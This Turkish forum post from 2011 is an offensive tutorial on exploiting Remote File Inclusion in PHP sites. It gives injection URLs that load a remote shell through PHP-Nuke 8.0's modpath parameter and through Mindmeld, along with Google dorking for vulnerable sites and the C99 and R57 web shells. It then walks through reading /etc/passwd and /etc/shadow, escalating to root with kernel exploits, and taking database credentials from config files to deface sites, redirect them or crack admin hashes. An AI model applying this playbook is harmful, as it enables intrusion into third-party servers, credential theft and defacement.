Yeni Sitemize Yönlendiriliyorsunuz !

Join the forum, it's quick and easy

Yeni Sitemize Yönlendiriliyorsunuz !

Would you like to react to this message? Create an account in a few clicks or log in to continue.

    Hedef Sitedeki Güvenlik Açıkları

    BOZKURT
    BOZKURT


    Mesaj Sayısı : 343 Aldığı teşekkürler : 5574 Nereden : evden Kayıt Tarihi : 06/02/11

    Hedef Sitedeki Güvenlik Açıkları Empty Hedef Sitedeki Güvenlik Açıkları

    Mesaj tarafından BOZKURT Ptsi Mayıs 02, 2011 5:56 pm

    Rfi: Remote File İnclusion ( Uzaktan Kod Çalıştırma ) ( Uzaktan Dosya Çalıştırma ) Hangisi Size Uygunsa Onu Kullanın =)
    Şimdi...Peki Nedir Bu Uzaktan Kod Çalıştımak ?

    Anladığımız Dilden Anlatmaya Çalışırsak : Php Kodlamasında İnclude Komutu İle Çalıştırılması Gereken Dosyanın Dizini Gösterilir
    Ve Bu Yolu Kullanarak O Dosya Üzerine Bizim İstediğimiz Başka Kodu Sistem Üzerinde Çalıştırma OLayına Mantıken Remote File İnclusion ( Rfi ) Diyoruz

    Phpyi Hazırlayan Yavşak Webmasterlerin Yaptıkları Bu Kodlama Hatası Ne İşimize Yarıyıcak ?
    Eğer Server Üzerinde Serverdeki Dizinleri Gösterebilen.Servere Dosya Upload Edebilen
    Gerektiğinde Port Açabilen Kodlar Bulunan Bir Dosya Çalıştırılırsa İşte Bu
    Heykır İçin Güzel Bir Fırsat Oluyo.Rfi Açıkları Sayesinde Sadece Açık Olan Siteye Değil, Top Yekün Bütün Servere Olabiliriz.
    İşte Biz Bu Server Üzerinde Erişime Sahip Olmamızı Sağlayan Kodlara '' Listpath '' Diyoruz.Alemde Bolca Bu Listpathlardan Bolca Bulabilirsiniz ( R57 , C99 ) Gibi

    Rfi Açıklarını ( Güncel ) Nerden Bulucaz Derseniz ? Herkesin Kullandığı milw0rm.com ve ya org Farketmez Ya Da Benim Sitemden En İyilerini Alabilirsiniz
    Hiç Keşfedilmemiş Bir Rfi Açığını Sizde Keşfedebilirsiniz.Şimdi Gelelim Kodlama Hatalarına.Bakalım Ne Tarz Kodlama Hataları Rfi Açığının Oluşmasını Sağlıyor.

    Php Kodlamalarında Kullanılan Bu Komutlar Sizler İçin Çok Önemlidir !

    include
    include_once

    require
    require_once

    Bunların Olduğu Yerlere Bakıcaz Açık (rfi) Ararken
    Örneklerle Açıklayalım;
    Yeni Potallardan Biri Olan PHP-NUKE 8.0 ' Daki Kodları İnceledik Ve Bakdıkki Şöyle Bi Kod Yazılmış =)

    include($modpath); in nuke8/html/modules.php

    '' $ '' Karakterinin Yanındaki Modpath Kısmı Bizim İçin En Önemli Yerlerinden Biri.Dosya Çalıştırma Yolumuz Modpath Oluyor Ve Açığımız Örnekle Şu Şekilde Oluyor;

    hedefsitemiz.org/html/modules.php?modpath=listpath ımız?(shell linkimiz)

    Başka Bir Kod İnceleyelim

    Eski Bi Açıktan Yola Çıkarak
    - Mindmeld-1.2.0.10/acweb/admin_index.php: line 54

    require_once ($MM_GLOBALS['home']."include/utilities.inc"


    Eğer Kodumuz Yukardaki Gibiyse Linkimiz:
    hedefsitemiz.org/mindmeld/include/ask.inc.php?MM_G LOBALS[home]=Listpathımız
    ---

    Peki Şimdi Arkadaşlar Bugtraqlerden Bulduğumuz Ya Da Kendi Keşfettiğimiz Bir Rfi Açığı İle Neler Yapabiliriz :S ?

    1.Ya Ahına Ya Bokuna Saldırı
    2.Sistemli(mantıklı) Saldırı

    Açıklamasıyla...
    Birinci Saldırıyı Şu Şekilde Yapabilirsiniz; Rfi Açığının Olduğu Portalı,Blogu Vs Kullanan Siteleri O Portal İle Özdeşleşmiş Bir Arama Kodu İle Google Amcamıza Girerek Aratarak
    Açık Olan Siteleri Bulup Dala Dingir Dalariz

    Hangi Kelimeyi Aratıcaz ?
    Bunu Bilmek İçin Sitedeki İndex.php Ya Da Config.php
    Sayfalarındaki Kodlara Bakmanız Yeterlidir.

    Bu Şekilde Serverelere Girip Hack Yapabilirsizin.Tabi Permler İizn Veriyosa
    ---

    Perm DemişkenBu Konudanda Bahsedelim.Çünkü Permission Kavramı Önemli Bir Kavram
    Mesela Rfi Kullanarak Daldınız Servere Ve Server index.php Nin Yanında Şunlar Yazıyor : rwxrx-x-----
    r: Read - Okuma İzni
    x: Executable - Çalıştırma İzni
    w: Write - Yazma İzni

    Şimdi Yukarudaki 9 Karakter Yanyana Yazılmış İlk 3 Tanesi Dosya Sahibinin Yetkilerini
    Sondaki 3 Tane İse Herhangi Bir Malın Yetkilerini Gösteriyor.
    Yani Beyler Yukarıdaki Permlere Sahip Olan Dosyayı Dosya Sahibi Herşeyi Yapabilir.Ama Siz Servere Girince Mön Mön Bakarsınız :S

    Aaa Hakaret Ediyon Lazu Bize Demeyin Mö Mön Bakmayın Sizde O Zaman.Nasıl Yapıcaz Derseniz ? Permleri Aşan Bypasslar Var Onları Kullanabilirsiniz.
    ---

    Şimdi Gelelim Asıl Önemli Olan Belli Hedefe Sistemli(Mantıklı) Saldırıya.Sistemli Saldırıda Yapabileceklerimizi SıralarsakPortalı Örnek Alıyorum)

    1.Hedef Sistemin Portalını Öğrenmek
    2.Hazır Portal Değil İse Siteyi Hosttan Çekmek
    3.Serverde Safe Mode: Off İse Root Olmaya Çalışmak
    4.Sitede Açık Yoksa Serverdeki Diğer Sitelere Bakmak (Whois Çekerek)
    5.Permler İzin Vermiyosa Config Okuyarak Dbsine Bağlanmak.Ftpsine Bağlanarak vs Hacklemek

    Temelde Bunlar Yapılır
    ---

    Öncelik Hedefteki Sitenin Hangi Portal Kullandığını Öğrenmeliyiz.Sisteme Giriyoruz.İyice Bi İnceliyoruz Kız Alır Gibi.Genellikle En Alt Kısımda VeYa Sağında,Solunda,Köşesinde Bir Yerinde Sitenin Kullandığı Portalın Adı Yazar.
    Veya Kaynağı Görüntüle Dediğinizde ''Copyright'' Gibi Kelimeleri Ararsanız Portalın Ne Olduğu Ap Açık Anlarsınıza Zaten amk

    Örneğin; Powered By MKPortal 1.3.5 Yazısını Bulduk
    Öncelikle Yapacağımız Şey Google Amcamıza Girip MKPortal 1.3.5'e
    Ait Bulunmuş Rfi Açığı Varmı Bunu Araştırıyoruz.Eğer Yok İse MKPortal 1.3.5 Portalını İndiriyoruz Ve Kendimiz Aramaya Başlıyoruz.Olduki Ana Portal Üzerinde Hiçbir Açık Bulamadık.
    O Zaman Yapacağımız Şey Sitede Portala Ait Eklenti Kullanılmışmı ? Bunu Anlamak İçin Yine Siteyi Karı Seçer Gibi Gözden Geçirmemiz Lazım
    Ve Hangi Eklentiler Olabileceğini Anlamamız Lazım VeYA İntell Tamper Programı İle Sitenin Dizinlerinden Kullanılan Eklentileri Anlayabilirsiniz.

    Örneğin; Dizinlerde Xchat Diye Bir Dizin Adı Gördünüz Ve Sitede Xchat Modülü Kullanıldığını Anlandınız.O Zaman Bu Modulün Açığı Varmı Aratıyoruz VeYa Kendimiz Bakıyoruz.Bir Açık Çıkması Muhtemeldir
    Çünkü Portalında Hiçbir Rfi Açığı Bulunmayan Vb De Bile Modullerinde Açıklar Çıkabiliyor 142 Açalım Kalkanları
    ---

    Eveeet.Sitenin Portalını Bulamadık VeYa Webmaster Kendi Yazmış Olabilir.Bu Portalı Sitede Açık Olmayacağı Anlamına Gelmez =).İntelli Tamper,Acunetix Gibi Programlarla Siteyi Aratıyoruz
    Ve Sitenin Tüm Dizinlerini Göürüyoruz . Bu Biraz Uzun Sürebilir.Bu Seferde İndirdiğimiz Sayfalardaki Kodlara Bakıp Rfi Arıyoruz.Eğer Saklamamış İse Dizinler Yoksa Bütün Dizinleri
    İndirip Bakabiliriz.Bunun İçin inc.pl Kullanmamız Lazım .Kullanımı Oldukça Basit.Bilgisayarınıza ActivePerl Yükledikten Sonra bin Klasörüne Atıyorsunuz İnc.pl' yi Sonra Komut
    Sisteminde C:/perl/bin' e Gelip Perl İnc.pl >Portalın Olduğu Dosya> Yazıyorsunuz Ve O Karşınıza Bütün İncludeleri Döküyor =)
    ---
    Sitede Hiçbir Şekilde Açık Bulamadık Farzedelim.VeYa
    Hedefimize Html İle Kodlanmış Bir Site Var Olduğunu Düşünelim.O Zaman Yapacağımız İş Aynı Serverde Başka Siteleri Bularak Rfi Açığı Varmı Ona Bakmalıyız.
    Bunun İçin;
    whois.webhosting.com
    [Linkleri görebilmeniz için 1 kaç saniyenizi ayırıp üye olmanız gerekiyor. Hemen Üye Olmak için TIKLAYIN...]
    Gibi Sitelere Girip Hedef Sistemizin İp Numarasıyla Arama Yapıyoruz.Ve O Serverde Başka Hangi Siteler Var Bunları Araştırıyoruz.
    Örneğin: Server İçerisinde 10 Tane Site Olduğunu Öğrendik O Zaman PHP İle Kodlanmış Sitelerde Yukarda Anlattıklarımı Yapmanız Lazım.
    Eğer Bulduğumuz Taktirde Hedef Olan Sitemize Ulaşma İmkanımız Olucaktır =) Bu Adımdaki Süreç Biraz Uzun Ve Zahmetli Olabilir.Ama Önemli Bir Hedef İçin Değmezmi =)
    ---

    Ohh Nihayet Serverdeki Sitelerin Birinde Rfi Açığı Bulduk Ve Shellimi Kullanarak Servere Girdik.Şimdi Yapılması Gereken Şey Hedef Sitenin Olduğu Dizine Ulaşmaya Çalışmak
    Bu İşlemi Yaparken Kullanılan Listpath'in Beceerisi Önemlidir.Kullandığımuz Listpath Verdiğimiz Komutla İstediğimiz Dosyayı Okumamızı Sağlamalıdır.

    Öncelikle Standart Bir Şekilde Kullanılan İsimlerin Yazılı Olduğu Klasör Olan/etc/passwd Klasörüne Ulaşmaya Çalışıyoruz.Ulaşamadıysak Eğer Offf Demiyerek Diğer Komutları Kullanmalıyız
    /etc/vdomainaliases
    /var/named
    /etc/secure/
    /var/mail
    /etc/shadow
    Dosyalarını Okumaya Çalışıyoruz.Burdaki Amaç Hedef Sitenin Hangi Dizinde Ve Hangi Ad Altında Bulunduğunu Öğreniyoruz.Örneğin: etc/passwd Klasörü Şu Şekildedir.

    root:x:0:0:root:/bin/bash
    HedefKişi:x:54:54:user:var/host/hefesite:/bin/fals e Şeklindedir.

    Burdan Anlayacağımız Şey Sitemiz var/host/hedefsite Dizininde Bulnuyor Ve Biz Bu Dizini Geçmeye Çalışıyoruz.Evet Serverin İçine Girdik Ama Sitenin Dizinine Ulaşamıyoruz :S :S ?
    Çünkü Sistem Varsayılan Olarak Configure Edilmiş amk.Bu Durumda Ne Yapabiliriz ?
    Böyle Durumda Sistemdeki Yetkilerimizi Arttırma Yoluna Gidicez Uşaklar.Yani Yönetici(root) Sıfatını Kazanmaya Çalışacağız.Safe Mod: On İle Safe Mode: Off Serverler Arasındaki Fark
    Server Üzerinde Komut Çalıştırmamız Olmasıdır.Bu Sebeple Safe Mode: On Olan Serverlerde Root Olmak Zordur.Tabi Bunun İçin Yazılmış Exploitler Kullanıldığı Taktirde On Serverlarda
    Karnel Versiyona Göre Root Olunabilir.Linux Server Rooting Konusunu lazurix.org'den Bulabilirsiniz
    ---

    Eveet Sitenin Olduğu Dizine Ulaştık Fakat Ne Yönetici Yetkisi Alabiliyoruz NeDe Permler Site Üzerinde Değişiklik Yapmaya İzin Veriyor :S Bu Durumda Yaplıacak Şey Sitenin Config.php YaDa Configration.php,sql.php,db.php,wb-config.php
    Dosyalarını Okuyarak Hack Yapmaktır.Burada Mantık Sitenin sql(database) İle Bağlantı Kurup Site Üzerinde Değişiklik Yapmaktır =)
    Her Config.php Sayfasının İçinde Database Ve Ya Ftp Bilgileri Çıkmayabilir.Bu Şifreyi Kullanarak Sitenin Databasesini Oluşturan Tablolara Erişim Sağliyicaz
    Bu İşlem En Güzel C99 İle Oluyor Çok Rahat Yapabilirsiniz

    Bir Conrfig.php Şu Şekildedir:
    $dbhost="localhost"
    $dbname="xXx"
    $dbpass="xXx"
    $dbname="nuke"

    C99 Shell De Yukardaki SQL Kısmına Geldiğinizde Bu Verileri Girerek Sitenin Databasesine Ulaşabiliriz.
    Bunu Yaptıktan Sonra Yapabilecek Şeyler Çok Mesela Meta Atabiliriz.Meta Type Kısmına Yerleştirilecek Bir Yönlendirme Kodu İle Siteyi Açtıktan Sonra Kendi İndexiniz OLan Bir Siteye Yönlendirebilirsiniz.
    Ve Ya Admin Hashlarını Kırarak Sitede Admin Olabilirsiniz Ve Ya Hashları Editleyebilirsiniz.
    Forum Varsa Konuları Değişebilirsiniz

      Forum Saati Cuma Mayıs 10, 2024 10:38 am